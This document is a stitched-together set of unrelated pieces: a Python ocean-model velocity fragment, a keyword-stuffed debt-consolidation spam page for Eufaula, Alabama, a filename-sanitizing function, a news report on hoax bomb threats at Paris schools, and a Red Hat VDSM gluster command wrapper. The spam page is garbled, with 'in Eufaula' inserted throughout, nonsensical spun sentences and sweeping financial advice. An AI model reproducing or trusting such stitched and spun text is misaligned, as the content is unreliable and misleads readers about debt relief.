U = self._var.u[argtime, :, index]
V = self._var.v[argtime, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
else:
U = self._var.u[:, :, index]
V = self._var.v[:, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
if debug:
print '...passed'
#Plot mean values
if graph:
depth = np.mean(self.depth(station),axis=0)
vel = np.mean(velo_norm,axis=0)
error = np.std(velo_norm,axis=0)
self._plot.plot_xy(vel, depth, xerror=error[:],
title='Velocity norm profile ',
xLabel='Velocity (m/s) ', yLabel='Depth (m) ')
return velo_norm
def flow_dir(self, station, t_start=[], t_end=[], time_ind=[],
vertical=True, debug=False):
"""
Compute flow directions and associated norm at any given location.
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- flowDir = flowDir at (pt_lon, pt_lat), 2D array (ntime, nlevel)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- vertical = True, compute flowDir for each vertical level
*Notes*
- directions between -180 and 180 deg., i.e. 0=East, 90=North,
+/-180=West, -90=South
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing flow directions at point...'
#Search for the station
index = self.search_index(station)
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Choose the right pair of velocity components
if not argtime==[]:
if self._var._3D and vertical:
u = self._var.u[argtime,:,index]
v = self._var.v[argtime,:,index]
else:
u = self._var.ua[argtime,index]
v = self._var.va[argtime,index]
#Compute directions
if debug: print 'Computing arctan2 and norm...'
dirFlow = np.rad2deg(np.arctan2(v,u))
if debug:
print '...Passed'
return np.squeeze(dirFlow)
#TR_comments: templates
# def whatever(self, debug=False):
# if debug or self._debug:
# print 'Start whatever...'
#
# if debug or self._debug:
# print '...Passed'
|
If you in Eufaula Alabama have been wary of taking a keen look in Eufaula at your credit report then we are glad to inform you in Eufaula that there is no reason to be afraid in Eufaula. After all, it is only bills reporting of what you already know in Eufaula all about. It should not come as a surprise in Eufaula AL that you either have earned a great credit score in Eufaula and rating or definitely have earned a negative one! A credit card debt counseling program will clear things in Eufaula you if you have forgotten what that credit score in Eufaula really happens to be these days in Eufaula. From time to time, there is a lapse in Eufaula of selective memories of this we are well aware in Eufaula Alabama of and sympathize with as well in Eufaula.
With every financial growth, individual expenditure fires over the top in Eufaula. With every crisis, arrives an upswing in Eufaula of numerous brand new consolidate debt in Eufaula providers. Throughout a rate of growth in Eufaula, banks may give unguaranteed credit readily in Eufaula and become pleased to provide cash advance lending to actually just about anyone in Eufaula. This particular shot associated with credit cards implies that credit card debt settlement customers will probably be pleased spenders in Eufaula Alabama as well as nourish any economic climate in Eufaula by using money they do not really possess in Eufaula. Quite simply, this really is money in Eufaula with absolutely no actual worth powering this in Eufaula.
Are you in Eufaula sitting there all comfortable in your home in Eufaula, happily tapping away on the laptop oblivious to the debts damage in Eufaula that is being inflicted upon one in Eufaula of the most important money barometers' in Eufaula in your life? A glimpse at your free debt report in Eufaula today and get a credit card consolidating will set you back in the right frame in Eufaula Alabama of mind in and point you in the right direction in Eufaula for any future big ticket in Eufaula purchases and plans. The ability in Eufaula to fund a big project such as a college education in Eufaula for your child is a very important part in Eufaula of being all grown up! If this in Eufaula has hit you in the head in and heart in Eufaula then check out consolidate debt in Eufaula services today.
When the growth in Eufaula has ended and individuals remain along in Eufaula with several charge cards to repay in Eufaula, after that anxiousness increases, telephone calls in Eufaula AL throughout supper arrive non stop, and also credit card counseling companies begin their own marketing in Eufaula. What's missing out of the majority of individuals in Eufaula Alabama thoughts is they may also take advantage in Eufaula of consumer consolidate debt in Eufaula.
In contrast to credit card debt consolidating, consumer credit counseling providers in Eufaula don't cause you to buy their goods in Eufaula or even move the charge card amounts to these people in Eufaula Alabama. A good number of operate in Eufaula out of an charitable perspective and may work in Eufaula nicely along with consolidate debt in Eufaula providers. They'll educate you on methods in Eufaula and provide you with the training in Eufaula AL you require to see how in Eufaula better to repay all of our financial online cash advance loans within the quickest fashion in Eufaula.
Do you dread the daily visit in Eufaula of the mailman? Have you turned the ringer in Eufaula on your phone off because of the constant calls in Eufaula Alabama? Deep debt and don't know what to do in Eufaula. Don't worry consolidate debt in Eufaula is your best answer..
Almost every person in Eufaula has gotten into some kind of credit cards trouble at some point in their lives in Eufaula AL. That doesn't define you, it is how you get out of it in Eufaula. That is why credit card counseling is so good for you. In consolidate debt in Eufaula you are still paying off what you rightly owe in Eufaula, but at a slower pace. It's not like bankruptcy in Eufaula were you lose everything and it's on your record for years in Eufaula.
There are so many credit card counseling companies that offer credit card debt settlement out there now. Make sure you understand how each debt management service is run and what their credit card counseling terms are before you agree. Most will take all your credit cards information and send letters to the places in Eufaula you owe after you have entered this debt settlement program and get them to agree to a lower bills payment. Then they will give you a credit card consolidation payment amount that you pay when you consolidate debt in Eufaula once a month with debt consolidating. Once you enter into a debt relief program and the consolidate debt in Eufaula company notifies the creditors in Eufaula that you have enter the credit card debt management program, they are suppose to stop calling you.
Not only does it make the consolidate debt in Eufaula payments smaller and more manageable in Eufaula Alabama, but it gives you some peace and less stress from the credit cards phone calls. Credit consolidating Eufaula Alabama is the best way to get out of debt, no matter how small or large the debt is in Eufaula. If you are having trouble keeping up in Eufaula with your bills payments, then you need to talk to consolidate debt in Eufaula company today.
|
from __future__ import unicode_literals
import sys
import unicodedata
import warnings
class ReplacementLengthWarning(UserWarning):
pass
warnings.filterwarnings("always", category=ReplacementLengthWarning)
def _are_unicode(unicode_args=[]):
if sys.version_info[0] == 2:
return all((type(arg) == unicode) for arg in unicode_args)
# Assume Python 3
return all((type(arg) == str) for arg in unicode_args)
def sanitize_path_fragment(
original_fragment,
filename_extension = '', # when you do want a filename extension, there is no need to include the leading dot.
target_file_systems = {
'btrfs', 'ext', 'ext2', 'ext3', 'ext3cow', 'ext4', 'exfat', 'fat32',
'hfs+', 'ntfs_win32', 'reiser4', 'reiserfs', 'xfs', 'zfs',
},
sanitization_method = 'underscore',
truncate = True,
replacement = '_',
additional_illegal_characters=[],
):
# Enforce that these args are unicode strings
unicode_args = [original_fragment, filename_extension, replacement] + additional_illegal_characters
if not _are_unicode(unicode_args):
raise ValueError(
'`original_fragment`, `filename_extension`, `replacement`, and `additional_illegal_characters` '
'must be of the unicode type under Python 2 or str type under Python 3.'
)
if len(replacement) > 1:
warnings.warn(
"The replacement is longer than one character. "
"The length of the resulting string cannot be guaranteed to fit the target file systems' length limit.",
ReplacementLengthWarning
)
sanitized_fragment = unicodedata.normalize('NFC', original_fragment)
if len(filename_extension) > 0:
filename_extension = unicodedata.normalize('NFC', '.' + filename_extension)
if sanitization_method == 'underscore':
illegal_characters = {
'btrfs': {'\0', '/'},
'ext': {'\0', '/'},
'ext2': {'\0', '/'},
'ext3': {'\0', '/'},
'ext3cow': {'\0', '/', '@'},
'ext4': {'\0', '/'},
'exfat': {
'\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
'\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
'/', '\\', ':', '*', '?', '"', '<', '>', '|',
},
'fat32': { # TODO: Confirm this list; current list is just a wild guess, assuming UTF-16 encoding.
'\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
'\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
'/', '\\', ':', '*', '?', '"', '<', '>', '|',
},
# In theory, all Unicode characters, including NUL, are usable in HFS+; so this is just
# a sane set for legacy compatibility - e.g. OS APIs that don't support '/' and ':'.
'hfs+': {'\0', '/', ':'},
'ntfs_win32': {'\0', '/', '\\', ':', '*', '?', '"', '<', '>', '|'}, # NTFS Win32 namespace (stricter)
'ntfs_posix': {'\0', '/'}, # NTFS POSIX namespace (looser)
'reiser4': {'\0', '/'},
'reiserfs': {'\0', '/'},
'xfs': {'\0', '/'},
'zfs': {'\0', '/'},
'additional_illegal_characters': set(additional_illegal_characters),
}
# Replace illegal characters with an underscore
# `target_file_systems` is used further down, so we don't want to pollute it here.
_temp_target_file_systems = set.union(target_file_systems, {'additional_illegal_characters'})
illegal_character_set = set.union(*(illegal_characters[file_system] for file_system in _temp_target_file_systems))
# It would be stupid if the replacement contains an illegal character.
if any(character in replacement for character in illegal_character_set):
raise ValueError('The replacement contains a character that would be illegal in the target file system(s).')
for character in illegal_character_set:
sanitized_fragment = sanitized_fragment.replace(character, replacement)
filename_extension = filename_extension.replace(character, replacement)
# "Quote" illegal filenames
if target_file_systems.intersection({'fat32', 'ntfs_win32'}):
windows_reserved_names = (
"CON", "PRN", "AUX", "NUL",
"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
)
if sanitized_fragment in windows_reserved_names:
sanitized_fragment = replacement + sanitized_fragment + replacement
if filename_extension in windows_reserved_names:
filename_extension = replacement + filename_extension + replacement
# Truncate if the resulting string is too long
if truncate:
max_lengths = {
# For the entries of file systems commonly found with Linux, the length, 'utf-8',
# and 'NFC' are only assumptions that apply to mostly vanilla kernels with default
# build parameters.
# Seriously, this is 2013. The fact that the Linux community does not move to a file
# system with an enforced Unicode filename encoding is as bad as Windows 95's
# codepage madness, some 18 years ago.
# If you add more file systems, see if it is affected by Unicode Normal Forms, like
# HFS+; You may have to take extra care in editing the actual sanitization routine
# below.
'btrfs': (255, 'bytes', 'utf-8', 'NFC'),
'ext': (255, 'bytes', 'utf-8', 'NFC'),
'ext2': (255, 'bytes', 'utf-8', 'NFC'),
'ext3': (255, 'bytes', 'utf-8', 'NFC'),
'ext3cow': (255, 'bytes', 'utf-8', 'NFC'),
'ext4': (255, 'bytes', 'utf-8', 'NFC'),
'exfat': (255, 'characters', 'utf-16', 'NFC'),
# 'utf-16' is not entirely true. FAT32 used to be used with codepages; but since
# Windows XP, the default seems to be UTF-16.
'fat32': (255, 'characters', 'utf-16', 'NFC'),
# FIXME: improve HFS+ handling, because it does not use the standard NFD. It's
# close, but it's not exactly the same thing.
'hfs+': (255, 'characters', 'utf-16', 'NFD'),
'ntfs_win32': (255, 'characters', 'utf-16', 'NFC'),
'ntfs_posix': (255, 'characters', 'utf-16', 'NFC'),
# ReiserFS 3 and 4 support filenames > 255 bytes. I don't care if the vanilla Linux
# kernel can't support that. That's Linux's problem, not mine.
'reiser4': (3976, 'bytes', 'utf-8', 'NFC'),
'reiserfs': (4032, 'bytes', 'utf-8', 'NFC'),
'xfs': (255, 'bytes', 'utf-8', 'NFC'),
'zfs': (255, 'bytes', 'utf-8', 'NFC'),
}
for file_system in target_file_systems:
if max_lengths[file_system][1] == 'bytes':
extension_bytes = unicodedata.normalize(max_lengths[file_system][3], filename_extension).encode(max_lengths[file_system][2])
temp_fragment = bytearray()
for character in sanitized_fragment:
encoded_bytes = unicodedata.normalize(max_lengths[file_system][3], character).encode(max_lengths[file_system][2])
if len(temp_fragment) + len(encoded_bytes) + len(extension_bytes)<= max_lengths[file_system][0]:
temp_fragment = temp_fragment + encoded_bytes
else:
break
sanitized_fragment = unicodedata.normalize('NFC', temp_fragment.decode(max_lengths[file_system][2]))
else: # Assume 'characters'
temp_fragment = ''
if file_system == 'hfs+':
normalize = unicodedata.ucd_3_2_0.normalize
else:
normalize = unicodedata.normalize
normalized_extension = normalize(max_lengths[file_system][3], filename_extension)
for character in sanitized_fragment:
normalized_character = normalize(max_lengths[file_system][3], character)
if len(temp_fragment) + len(normalized_character) + len(normalized_extension) <= max_lengths[file_system][0]:
temp_fragment += normalized_character
else:
break
sanitized_fragment = unicodedata.normalize('NFC', temp_fragment)
sanitized_fragment = sanitized_fragment + filename_extension
# Disallow a final dot or space for FAT32 and NTFS in Win32 namespace.
# This can only be done after truncations because otherwise we may fix the fragment, but
# still end up with a bad ending character once it's truncated
if (
target_file_systems.intersection({'fat32', 'ntfs_win32'}) and
(sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' '))
):
if replacement.endswith('.') or replacement.endswith(' '):
raise ValueError(
'The sanitized string ends with a dot or space, and the replacement also ends with a dot or space. '
'Therefore the string cannot be sanitized for fat32 or ntfs_win32.'
)
while (sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' ')):
sanitized_fragment = sanitized_fragment[:-1] + replacement
else:
raise ValueError("sanitization_method must be a valid sanitization method.")
return sanitized_fragment
|
At least five Paris high schools were evacuated on Thursday morning after bomb threats were made for the second time this week.
The affected high schools were Louis-le-Grand (5th arrondissement), Charlemagne (4th), Condorcet (9th), Hélène Boucher (20th) and Victor-Hugo (3rd).
The caller said that they would arrive at the schools armed with "bombs and Kalashnikovs to get the maximum amount of victims," reported Le Parisien newspaper.
This tweet from the Paris education authority Academie de Paris says police are securing the five schools mentioned above, adding that the students have been taken to a safe location.
Charlemagne, Louis le Grand, and Condorcet were all hit by similar threats on Tuesday, when a total of six high schools in Paris were evacuated after anonymous calls were made claiming bombs had been hidden in the buildings.
With Paris still on high alert after the November terror attacks Tuesday's threats were taken seriously.
Also on Tuesday, 14 schools in Britain were evacuated following hoax bomb threats.
Those threats were claimed by a Twitter account calling itself the Evacuation Squad, with a profile picture of Russian President Vladimir Putin.
The account featured previous messages in support of Syrian President Bashar al-Assad.
"We are 6 individuals based internationally," reads the profile blurb, advertising its services to call in bomb threats.
|
#
# Copyright 2012-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
from __future__ import absolute_import
import calendar
import logging
import os
import socket
import time
import xml.etree.cElementTree as etree
from vdsm.common import cmdutils
from vdsm import commands
from vdsm.gluster import exception as ge
from vdsm.network.netinfo import addresses
from . import gluster_mgmt_api, gluster_api
_glusterCommandPath = cmdutils.CommandPath("gluster",
"/usr/sbin/gluster",
)
_TIME_ZONE = time.tzname[0]
if hasattr(etree, 'ParseError'):
_etreeExceptions = (etree.ParseError, AttributeError, ValueError)
else:
_etreeExceptions = (SyntaxError, AttributeError, ValueError)
def _getGlusterVolCmd():
return [_glusterCommandPath.cmd, "--mode=script", "volume"]
def _getGlusterPeerCmd():
return [_glusterCommandPath.cmd, "--mode=script", "peer"]
def _getGlusterSystemCmd():
return [_glusterCommandPath.cmd, "system::"]
def _getGlusterVolGeoRepCmd():
return _getGlusterVolCmd() + ["geo-replication"]
def _getGlusterSnapshotCmd():
return [_glusterCommandPath.cmd, "--mode=script", "snapshot"]
class BrickStatus:
PAUSED = 'PAUSED'
COMPLETED = 'COMPLETED'
RUNNING = 'RUNNING'
UNKNOWN = 'UNKNOWN'
NA = 'NA'
class HostStatus:
CONNECTED = 'CONNECTED'
DISCONNECTED = 'DISCONNECTED'
UNKNOWN = 'UNKNOWN'
class VolumeStatus:
ONLINE = 'ONLINE'
OFFLINE = 'OFFLINE'
class TransportType:
TCP = 'TCP'
RDMA = 'RDMA'
class TaskType:
REBALANCE = 'REBALANCE'
REPLACE_BRICK = 'REPLACE_BRICK'
REMOVE_BRICK = 'REMOVE_BRICK'
class SnapshotStatus:
ACTIVATED = 'ACTIVATED'
DEACTIVATED = 'DEACTIVATED'
def _execGluster(cmd):
return commands.execCmd(cmd)
def _execGlusterXml(cmd):
cmd.append('--xml')
rc, out, err = commands.execCmd(cmd)
if rc != 0:
raise ge.GlusterCmdExecFailedException(rc, out, err)
try:
tree = etree.fromstring('\n'.join(out))
rv = int(tree.find('opRet').text)
msg = tree.find('opErrstr').text
errNo = int(tree.find('opErrno').text)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=out)
if rv == 0:
return tree
else:
if errNo != 0:
rv = errNo
raise ge.GlusterCmdFailedException(rc=rv, err=[msg])
def _getLocalIpAddress():
for ip in addresses.getIpAddresses():
if not ip.startswith('127.'):
return ip
return ''
def _getGlusterHostName():
try:
return socket.getfqdn()
except socket.herror:
logging.exception('getfqdn')
return ''
@gluster_mgmt_api
def hostUUIDGet():
command = _getGlusterSystemCmd() + ["uuid", "get"]
rc, out, err = _execGluster(command)
if rc == 0:
for line in out:
if line.startswith('UUID: '):
return line[6:]
raise ge.GlusterHostUUIDNotFoundException()
def _parseVolumeStatus(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': [],
'nfs': [],
'shd': []}
hostname = _getLocalIpAddress() or _getGlusterHostName()
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
ports = {}
for ch in el.find('ports').getchildren():
ports[ch.tag] = ch.text or ''
if value['path'] == 'localhost':
value['path'] = hostname
if value['status'] == '1':
value['status'] = 'ONLINE'
else:
value['status'] = 'OFFLINE'
if value['hostname'] == 'NFS Server':
status['nfs'].append({'hostname': value['path'],
'hostuuid': value['peerid'],
'port': ports['tcp'],
'rdma_port': ports['rdma'],
'status': value['status'],
'pid': value['pid']})
elif value['hostname'] == 'Self-heal Daemon':
status['shd'].append({'hostname': value['path'],
'hostuuid': value['peerid'],
'status': value['status'],
'pid': value['pid']})
else:
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'port': ports['tcp'],
'rdma_port': ports['rdma'],
'status': value['status'],
'pid': value['pid']})
return status
def _parseVolumeStatusDetail(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
sizeTotal = int(value['sizeTotal'])
value['sizeTotal'] = sizeTotal / (1024.0 * 1024.0)
sizeFree = int(value['sizeFree'])
value['sizeFree'] = sizeFree / (1024.0 * 1024.0)
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'sizeTotal': '%.3f' % (value['sizeTotal'],),
'sizeFree': '%.3f' % (value['sizeFree'],),
'device': value['device'],
'blockSize': value['blockSize'],
'mntOptions': value['mntOptions'],
'fsName': value['fsName']})
return status
def _parseVolumeStatusClients(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
hostname = el.find('hostname').text
path = el.find('path').text
hostuuid = el.find('peerid').text
clientsStatus = []
for c in el.findall('clientsStatus/client'):
clientValue = {}
for ch in c.getchildren():
clientValue[ch.tag] = ch.text or ''
clientsStatus.append({'hostname': clientValue['hostname'],
'bytesRead': clientValue['bytesRead'],
'bytesWrite': clientValue['bytesWrite']})
status['bricks'].append({'brick': '%s:%s' % (hostname, path),
'hostuuid': hostuuid,
'clientsStatus': clientsStatus})
return status
def _parseVolumeStatusMem(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
brick = {'brick': '%s:%s' % (el.find('hostname').text,
el.find('path').text),
'hostuuid': el.find('peerid').text,
'mallinfo': {},
'mempool': []}
for ch in el.find('memStatus/mallinfo').getchildren():
brick['mallinfo'][ch.tag] = ch.text or ''
for c in el.findall('memStatus/mempool/pool'):
mempool = {}
for ch in c.getchildren():
mempool[ch.tag] = ch.text or ''
brick['mempool'].append(mempool)
status['bricks'].append(brick)
return status
@gluster_mgmt_api
def volumeStatus(volumeName, brick=None, option=None):
"""
Get volume status
Arguments:
* VolumeName
* brick
* option = 'detail' or 'clients' or 'mem' or None
Returns:
When option=None,
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'port': PORT,
'rdma_port': RDMA_PORT,
'status': STATUS,
'pid': PID}, ...],
'nfs': [{'hostname': HOST,
'hostuuid': UUID,
'port': PORT,
'rdma_port': RDMA_PORT,
'status': STATUS,
'pid': PID}, ...],
'shd: [{'hostname': HOST,
'hostuuid': UUID,
'status': STATUS,
'pid': PID}, ...]}
When option='detail',
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'sizeTotal': SIZE,
'sizeFree': FREESIZE,
'device': DEVICE,
'blockSize': BLOCKSIZE,
'mntOptions': MOUNTOPTIONS,
'fsName': FSTYPE}, ...]}
When option='clients':
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'clientsStatus': [{'hostname': HOST,
'bytesRead': BYTESREAD,
'bytesWrite': BYTESWRITE}, ...]},
...]}
When option='mem':
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'mallinfo': {'arena': int,
'fordblks': int,
'fsmblks': int,
'hblkhd': int,
'hblks': int,
'keepcost': int,
'ordblks': int,
'smblks': int,
'uordblks': int,
'usmblks': int},
'mempool': [{'allocCount': int,
'coldCount': int,
'hotCount': int,
'maxAlloc': int,
'maxStdAlloc': int,
'name': NAME,
'padddedSizeOf': int,
'poolMisses': int},...]}, ...]}
"""
command = _getGlusterVolCmd() + ["status", volumeName]
if brick:
command.append(brick)
if option:
command.append(option)
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeStatusFailedException(rc=e.rc, err=e.err)
try:
if option == 'detail':
return _parseVolumeStatusDetail(xmltree)
elif option == 'clients':
return _parseVolumeStatusClients(xmltree)
elif option == 'mem':
return _parseVolumeStatusMem(xmltree)
else:
return _parseVolumeStatus(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeInfo(tree):
"""
{VOLUMENAME: {'brickCount': BRICKCOUNT,
'bricks': [BRICK1, BRICK2, ...],
'options': {OPTION: VALUE, ...},
'transportType': [TCP,RDMA, ...],
'uuid': UUID,
'volumeName': NAME,
'volumeStatus': STATUS,
'volumeType': TYPE,
'disperseCount': DISPERSE_COUNT,
'redundancyCount': REDUNDANCY_COUNT,
'isArbiter': [True/False]}, ...}
"""
volumes = {}
for el in tree.findall('volInfo/volumes/volume'):
value = {}
value['volumeName'] = el.find('name').text
value['uuid'] = el.find('id').text
value['volumeType'] = el.find('typeStr').text.upper().replace('-', '_')
status = el.find('statusStr').text.upper()
if status == 'STARTED':
value["volumeStatus"] = VolumeStatus.ONLINE
else:
value["volumeStatus"] = VolumeStatus.OFFLINE
value['brickCount'] = el.find('brickCount').text
value['distCount'] = el.find('distCount').text
value['stripeCount'] = el.find('stripeCount').text
value['replicaCount'] = el.find('replicaCount').text
value['disperseCount'] = el.find('disperseCount').text
value['redundancyCount'] = el.find('redundancyCount').text
value['isArbiter'] = (el.find('arbiterCount').text == '1')
transportType = el.find('transport').text
if transportType == '0':
value['transportType'] = [TransportType.TCP]
elif transportType == '1':
value['transportType'] = [TransportType.RDMA]
else:
value['transportType'] = [TransportType.TCP, TransportType.RDMA]
value['bricks'] = []
value['options'] = {}
value['bricksInfo'] = []
for b in el.findall('bricks/brick'):
value['bricks'].append(b.text)
for o in el.findall('options/option'):
value['options'][o.find('name').text] = o.find('value').text
for d in el.findall('bricks/brick'):
brickDetail = {}
# this try block is to maintain backward compatibility
# it returns an empty list when gluster doesnot return uuid
try:
brickDetail['name'] = d.find('name').text
brickDetail['hostUuid'] = d.find('hostUuid').text
brickDetail['isArbiter'] = (d.find('isArbiter').text == '1')
value['bricksInfo'].append(brickDetail)
except AttributeError:
break
volumes[value['volumeName']] = value
return volumes
def _parseVolumeProfileInfo(tree, nfs):
bricks = []
if nfs:
brickKey = 'nfs'
bricksKey = 'nfsServers'
else:
brickKey = 'brick'
bricksKey = 'bricks'
for brick in tree.findall('volProfile/brick'):
fopCumulative = []
blkCumulative = []
fopInterval = []
blkInterval = []
brickName = brick.find('brickName').text
if brickName == 'localhost':
brickName = _getLocalIpAddress() or _getGlusterHostName()
for block in brick.findall('cumulativeStats/blockStats/block'):
blkCumulative.append({'size': block.find('size').text,
'read': block.find('reads').text,
'write': block.find('writes').text})
for fop in brick.findall('cumulativeStats/fopStats/fop'):
fopCumulative.append({'name': fop.find('name').text,
'hits': fop.find('hits').text,
'latencyAvg': fop.find('avgLatency').text,
'latencyMin': fop.find('minLatency').text,
'latencyMax': fop.find('maxLatency').text})
for block in brick.findall('intervalStats/blockStats/block'):
blkInterval.append({'size': block.find('size').text,
'read': block.find('reads').text,
'write': block.find('writes').text})
for fop in brick.findall('intervalStats/fopStats/fop'):
fopInterval.append({'name': fop.find('name').text,
'hits': fop.find('hits').text,
'latencyAvg': fop.find('avgLatency').text,
'latencyMin': fop.find('minLatency').text,
'latencyMax': fop.find('maxLatency').text})
bricks.append(
{brickKey: brickName,
'cumulativeStats': {
'blockStats': blkCumulative,
'fopStats': fopCumulative,
'duration': brick.find('cumulativeStats/duration').text,
'totalRead': brick.find('cumulativeStats/totalRead').text,
'totalWrite': brick.find('cumulativeStats/totalWrite').text},
'intervalStats': {
'blockStats': blkInterval,
'fopStats': fopInterval,
'duration': brick.find('intervalStats/duration').text,
'totalRead': brick.find('intervalStats/totalRead').text,
'totalWrite': brick.find('intervalStats/totalWrite').text}})
status = {'volumeName': tree.find("volProfile/volname").text,
bricksKey: bricks}
return status
@gluster_api
@gluster_mgmt_api
def volumeInfo(volumeName=None, remoteServer=None):
"""
Returns:
{VOLUMENAME: {'brickCount': BRICKCOUNT,
'bricks': [BRICK1, BRICK2, ...],
'options': {OPTION: VALUE, ...},
'transportType': [TCP,RDMA, ...],
'uuid': UUID,
'volumeName': NAME,
'volumeStatus': STATUS,
'volumeType': TYPE}, ...}
"""
command = _getGlusterVolCmd() + ["info"]
if remoteServer:
command += ['--remote-host=%s' % remoteServer]
if volumeName:
command.append(volumeName)
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumesListFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeInfo(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeCreate(volumeName, brickList, replicaCount=0, stripeCount=0,
transportList=[], force=False, arbiter=False):
command = _getGlusterVolCmd() + ["create", volumeName]
if stripeCount:
command += ["stripe", "%s" % stripeCount]
if replicaCount:
command += ["replica", "%s" % replicaCount]
if arbiter:
command += ["arbiter", "1"]
if transportList:
command += ["transport", ','.join(transportList)]
command += brickList
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeCreateFailedException(rc=e.rc, err=e.err)
try:
return {'uuid': xmltree.find('volCreate/volume/id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeStart(volumeName, force=False):
command = _getGlusterVolCmd() + ["start", volumeName]
if force:
command.append('force')
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterVolumeStartFailedException(rc, out, err)
else:
return True
@gluster_mgmt_api
def volumeStop(volumeName, force=False):
command = _getGlusterVolCmd() + ["stop", volumeName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeStopFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeDelete(volumeName):
command = _getGlusterVolCmd() + ["delete", volumeName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeDeleteFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeSet(volumeName, option, value):
command = _getGlusterVolCmd() + ["set", volumeName, option, value]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeSetFailedException(rc=e.rc, err=e.err)
def _parseVolumeSetHelpXml(out):
optionList = []
tree = etree.fromstring('\n'.join(out))
for el in tree.findall('option'):
option = {}
for ch in el.getchildren():
option[ch.tag] = ch.text or ''
optionList.append(option)
return optionList
@gluster_mgmt_api
def volumeSetHelpXml():
rc, out, err = _execGluster(_getGlusterVolCmd() + ["set", 'help-xml'])
if rc:
raise ge.GlusterVolumeSetHelpXmlFailedException(rc, out, err)
else:
return _parseVolumeSetHelpXml(out)
@gluster_mgmt_api
def volumeReset(volumeName, option='', force=False):
command = _getGlusterVolCmd() + ['reset', volumeName]
if option:
command.append(option)
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeResetFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeAddBrick(volumeName, brickList,
replicaCount=0, stripeCount=0, force=False):
command = _getGlusterVolCmd() + ["add-brick", volumeName]
if stripeCount:
command += ["stripe", "%s" % stripeCount]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeBrickAddFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
